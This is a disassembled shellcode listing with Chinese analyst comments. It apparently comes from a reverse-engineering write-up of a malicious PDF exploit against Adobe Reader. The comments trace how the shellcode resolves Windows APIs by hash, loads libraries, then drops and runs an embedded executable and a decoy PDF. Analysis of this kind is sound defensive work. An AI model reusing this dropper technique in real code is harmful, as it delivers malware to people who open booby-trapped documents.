//调用过程07FF006D获取kernel32.dll基址
07FF04CF 8BF8 MOV EDI,EAX //保存eax
07FF04D1 6A 00 PUSH 0
07FF04D3 8B43 0E MOV EAX,DWORD PTR DS:[EBX+E] //取hash值
07FF04D6 50 PUSH EAX
07FF04D7 57 PUSH EDI
07FF04D8 E8 DCFBFFFF CALL 07FF00B9
//调用过程07FF00B9定位GetProcAddress地址
07FF04DD 8BF0 MOV ESI,EAX //保存在esi
07FF04DF 8973 0E MOV DWORD PTR DS:[EBX+E],ESI //
07FF04E2 85F6 TEST ESI,ESI
07FF04E4 74 67 JE SHORT 07FF054D //跳转未实现
07FF04E6 56 PUSH ESI
07FF04E7 8B43 0A MOV EAX,DWORD PTR DS:[EBX+A] //取hash值
07FF04EA 50 PUSH EAX
07FF04EB 57 PUSH EDI
07FF04EC E8 C8FBFFFF CALL 07FF00B9
//调用过程07FF00B9定位LoadLibraryA地址
07FF04F1 8943 0A MOV DWORD PTR DS:[EBX+A],EAX
07FF04F4 837B 0A 00 CMP DWORD PTR DS:[EBX+A],0
07FF04F8 74 53 JE SHORT 07FF054D //跳转未实现
07FF04FA 8D43 01 LEA EAX,DWORD PTR DS:[EBX+1] //eax为"kernel32"
07FF04FD 8945 00 MOV DWORD PTR SS:[EBP],EAX
07FF0500 EB 42 JMP SHORT 07FF0544 //跳转至07FF0544
07FF0502 8B45 00 MOV EAX,DWORD PTR SS:[EBP]
//该过程可重用,实现加载不同DLL
07FF0505 E8 23FBFFFF CALL 07FF002D
//获取"kernel32"的长度并保存在eax中
07FF050A 894424 08 MOV DWORD PTR SS:[ESP+8],EAX
07FF050E 8B45 00 MOV EAX,DWORD PTR SS:[EBP]
07FF0511 50 PUSH EAX //kernel32
07FF0512 FF53 0A CALL DWORD PTR DS:[EBX+A]
//调用LoadLibraryA加载kernel32.dll
07FF0515 8BF8 MOV EDI,EAX
07FF0517 8B4424 08 MOV EAX,DWORD PTR SS:[ESP+8]
07FF051B 40 INC EAX
07FF051C 0145 00 ADD DWORD PTR SS:[EBP],EAX
07FF051F EB 14 JMP SHORT 07FF0535 //跳转实现
07FF0521 8B43 0E MOV EAX,DWORD PTR DS:[EBX+E]
07FF0524 50 PUSH EAX
07FF0525 56 PUSH ESI
07FF0526 57 PUSH EDI
07FF0527 E8 8DFBFFFF CALL 07FF00B9
//调用过程07FF00B9定位所有使用的API地址
07FF052C 8B55 00 MOV EDX,DWORD PTR SS:[EBP]
07FF052F 8902 MOV DWORD PTR DS:[EDX],EAX
07FF0531 8345 00 04 ADD DWORD PTR SS:[EBP],4
07FF0535 8B45 00 MOV EAX,DWORD PTR SS:[EBP]
07FF0538 8B30 MOV ESI,DWORD PTR DS:[EAX]
07FF053A 85F6 TEST ESI,ESI
07FF053C ^ 75 E3 JNZ SHORT 07FF0521
//跳转07FF0521直到API都定位完毕
07FF053E 8345 00 04 ADD DWORD PTR SS:[EBP],4
07FF0542 FE0B DEC BYTE PTR DS:[EBX]
07FF0544 803B 00 CMP BYTE PTR DS:[EBX],0
07FF0547 ^ 77 B9 JA SHORT 07FF0502
//跳转加载"shell32"动态链接库
07FF0549 C60424 01 MOV BYTE PTR SS:[ESP],1
07FF054D 8A0424 MOV AL,BYTE PTR SS:[ESP]
07FF0550 83C4 0C ADD ESP,0C
07FF0553 5D POP EBP
07FF0554 5F POP EDI
07FF0555 5E POP ESI
07FF0556 5B POP EBX
07FF0557 C3 RETN //跳转至07FF0583
07FF0558 90 NOP
07FF0559 55 PUSH EBP //shellcode入口位置
07FF055A 8BEC MOV EBP,ESP
07FF055C 81C4 00FEFFFF ADD ESP,-200 //抬高栈空间
07FF0562 E8 00000000 CALL 07FF0567 //下一句07FF0567
07FF0567 58 POP EAX //保存当前位置
07FF0568 2D 463E4000 SUB EAX,403E46
07FF056D 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
07FF0570 B8 AC3E4000 MOV EAX,403EAC
07FF0575 0345 FC ADD EAX,DWORD PTR SS:[EBP-4]
07FF0578 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX
07FF057B 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
07FF057E E8 36FFFFFF CALL 07FF04B9 //跳07FF04B9
07FF0583 84C0 TEST AL,AL
07FF0585 74 40 JE SHORT 07FF05C7 //跳转未实现
07FF0587 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
07FF058A FF50 32 CALL DWORD PTR DS:[EAX+32]
//调用GetCommandLineA->AcroRd32.exe
07FF058D E8 17FCFFFF CALL 07FF01A9
07FF0592 E8 12FCFFFF CALL 07FF01A9
07FF0597 8BD0 MOV EDX,EAX
07FF0599 8D85 03FEFFFF LEA EAX,DWORD PTR SS:[EBP-1FD]
07FF059F E8 21FCFFFF CALL 07FF01C5
07FF05A4 8D95 03FEFFFF LEA EDX,DWORD PTR SS:[EBP-1FD]
07FF05AA B9 01000000 MOV ECX,1
07FF05AF 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
07FF05B2 E8 AEFCFFFF CALL 07FF0265 //释放exe并运行
07FF05B7 8D95 03FEFFFF LEA EDX,DWORD PTR SS:[EBP-1FD]
07FF05BD 33C9 XOR ECX,ECX
07FF05BF 8B45 F8 MOV EAX,DWORD PTR SS:[EBP-8]
07FF05C2 E8 9EFCFFFF CALL 07FF0265
//这里再次调用以释放pdf并执行,可惜进入后出错,不过exe已经执行!也算可以交差!
07FF05C7 8BE5 MOV ESP,EBP
07FF05C9 5D POP EBP
07FF05CA C3 RETN